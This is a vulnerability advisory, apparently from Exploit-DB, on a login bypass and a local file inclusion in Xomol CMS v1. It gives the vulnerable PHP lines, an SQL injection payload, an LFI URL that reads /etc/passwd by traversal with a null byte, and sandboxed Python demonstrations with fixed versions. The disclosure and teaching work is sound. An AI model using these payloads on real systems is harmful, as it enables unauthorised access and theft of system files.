Vendor: Xomol CMS
By: DNX
CVSS: 7.5 (HIGH)
Title: Login Bypass & LFI
CWE: 20
Product Name: Xomol CMS
Affected Version From: v1
Affected Version To: v1
Patch Exists: YES
Related CWE: N/A
CPE: a:xomol:xomol_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Xomol CMS v1 Login Bypass & LFI

Xomol CMS is a content management system based on PHP and MySQL. Two issues exist in the 'index.php' script. First, the 'email' and 'password' POST parameters are concatenated directly into the SQL query that looks up the user (SQL injection); a crafted 'email' value can terminate the string literal and comment out the password and status checks, which can be exploited to bypass authentication and gain administrative access. Second, the 'op' parameter is used without sanitization to build the path of a module file passed to include(); directory traversal sequences, combined with a null byte to cut off the appended '/index.php', can be exploited to include arbitrary local files and disclose sensitive information.

Mitigation:

Use parameterized queries (prepared statements) for the login lookup instead of concatenating 'email' and 'password' into the SQL string, and do not rely on magic_quotes_gpc as a defence. Validate 'op' against an allowlist of known module names (or a strict pattern such as letters, digits and underscore) before building the include path, and reject any value containing path separators or null bytes.

Exploit-DB raw data:

                     \#'#/
                     (-.-)
   -------------oOO---(_)---OOo------------
   |    Xomol CMS v1 Login Bypass & LFI   |
   |             coded by DNX             |
   ----------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.xomol.net
[!] Detected...: 12.05.2008
[!] Reported...: 13.05.2008 (didn't work: host mail.xomol.net said: 554 5.7.1 - Relay access denied)
[!] Response...: xx.xx.2008

[!] Background.: Xomol CMS is a content management system based on PHP and MySQL

[!] Bug Bypass.: $_POST['email'] and $_POST['password'] in index.php near line 59

                 58: if(!empty($_POST['email'])&&!empty($_POST['password'])){
                 59:      $sql='SELECT user_id FROM users WHERE user_email="'.$_POST['email'].'"  AND  user_password="'.md5($_POST['password']).'" AND user_status=1';
                 60:      $result = sql_query($sql, $dbi);

[!] Bug LFI....: $op in index.php near line 272

                 234: switch($op){

                 270:     default:
                 271:     if (file_exists('modules/'.$op.'/index.php')) {
                 272:         include('modules/'.$op.'/index.php');

[!] PoC Bypass.: Login with email: " OR user_group=1/*"" and password: not empty
                 (works only with magic_quotes_gpc = off)
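The following is an added example, not part of DNX's advisory or of Xomol CMS. It rebuilds the query from index.php line 59 in Python against an in-memory SQLite table (constructed here: the column names come from the query and the payload, the single admin row and its password are invented) and shows why the bypass works and why a parameterised query stops it. SQLite does not accept MySQL's double-quoted string literals, so the example uses single quotes and the payload's quote character is changed to match; everything else about the injection is the same.

```python
import hashlib
import sqlite3


def md5(password):
    # Xomol stores md5($_POST['password']); unsalted MD5 is weak in its own
    # right, but that is not the bug demonstrated here.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    # Constructed in-memory stand-in for the Xomol 'users' table.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_email TEXT,"
        " user_password TEXT, user_status INTEGER, user_group INTEGER)"
    )
    db.execute(
        "INSERT INTO users VALUES (1, 'admin@example.com', ?, 1, 1)",
        (md5("s3cret"),),
    )
    return db


def build_query(email, password):
    # Same string concatenation as index.php line 59, with single quotes
    # because SQLite (unlike MySQL) does not treat "..." as a string literal.
    return (
        "SELECT user_id FROM users WHERE user_email='" + email
        + "' AND user_password='" + md5(password) + "' AND user_status=1"
    )


def login_vulnerable(db, email, password):
    row = db.execute(build_query(email, password)).fetchone()
    return row[0] if row else None


def login_fixed(db, email, password):
    # Parameterised query: the values travel separately from the SQL text,
    # so a quote or comment marker inside 'email' is just data.
    row = db.execute(
        "SELECT user_id FROM users WHERE user_email=? AND user_password=?"
        " AND user_status=1",
        (email, md5(password)),
    ).fetchone()
    return row[0] if row else None


# DNX's payload with the quote character adapted for SQLite: the leading
# quote closes the email literal, OR user_group=1 matches an admin row, and
# the unterminated /* comments out the password and user_status checks.
# With magic_quotes_gpc on, PHP would prefix the quote with a backslash and
# MySQL would read it as part of the email string, which is why the
# advisory notes the bypass only works with magic_quotes_gpc off.
PAYLOAD = "' OR user_group=1/*"

if __name__ == "__main__":
    db = make_db()
    print(build_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("fixed:     ", login_fixed(db, PAYLOAD, "anything"))
```

Printing the built query makes the mechanism visible: the text after `/*` is never parsed, so the only condition the database evaluates is `user_email='' OR user_group=1`.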

[!] PoC LFI....: http://127.0.0.1/xomol/index.php?op=../../../../../../../../../../etc/passwd%00
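The following is an added example, not part of DNX's advisory or of Xomol CMS. It models the module include from index.php lines 271-272 in Python over a constructed temporary directory tree (a web root containing modules/news/index.php and, outside it, a file standing in for /etc/passwd), emulates the pre-5.3.4 PHP behaviour of truncating a filename at the first NUL byte (which is what the trailing %00 in the PoC relies on), and puts a hardened resolver beside it. The traversal depth is shortened to reach the temporary root rather than the filesystem root; the allowlist pattern in the fixed version is this example's choice, not the vendor's patch.

```python
import os
import re
import tempfile
from urllib.parse import unquote


def setup_tree():
    # Constructed layout: root/www/xomol is the web root, root/secret.txt
    # stands in for /etc/passwd (contents invented).
    root = tempfile.mkdtemp()
    web = os.path.join(root, "www", "xomol")
    os.makedirs(os.path.join(web, "modules", "news"))
    with open(os.path.join(web, "modules", "news", "index.php"), "w") as f:
        f.write("<?php echo 'news module'; ?>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return web


def op_from_url(url):
    # PHP URL-decodes the query string, so %00 becomes a real NUL byte in $op.
    return unquote(url.split("op=", 1)[1])


def php_null_truncate(path):
    # Emulates PHP before 5.3.4: the path was handed to C as a NUL-terminated
    # string, so everything after the first NUL byte was ignored.
    return path.split("\x00", 1)[0]


def include_vulnerable(web, op):
    # index.php lines 271-272: 'modules/'.$op.'/index.php' with no checks.
    # Without the NUL the appended '/index.php' would make the path miss;
    # with it, the path ends at the attacker-chosen file.
    rel = php_null_truncate("modules/" + op + "/index.php")
    path = os.path.join(web, rel)
    if not os.path.isfile(path):
        return None
    with open(path) as f:
        return f.read()


MODULE_NAME = re.compile(r"[A-Za-z0-9_]+")


def include_fixed(web, op):
    # Hardened form (example choice): allowlist the module name, then confirm
    # the resolved path is still inside the modules directory.
    if not MODULE_NAME.fullmatch(op):
        return None
    modules = os.path.realpath(os.path.join(web, "modules"))
    path = os.path.realpath(os.path.join(modules, op, "index.php"))
    if os.path.commonpath([modules, path]) != modules:
        return None
    if not os.path.isfile(path):
        return None
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    web = setup_tree()
    op = op_from_url("http://127.0.0.1/xomol/index.php?op=../../../secret.txt%00")
    print(repr(include_vulnerable(web, op)))
    print(repr(include_fixed(web, op)))
```

On a PHP build that rejects NUL bytes in paths the truncation step no longer applies, but the traversal itself still does; the allowlist is what closes the bug, and the realpath check catches any module name that slips past it.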

# milw0rm.com [2008-05-25]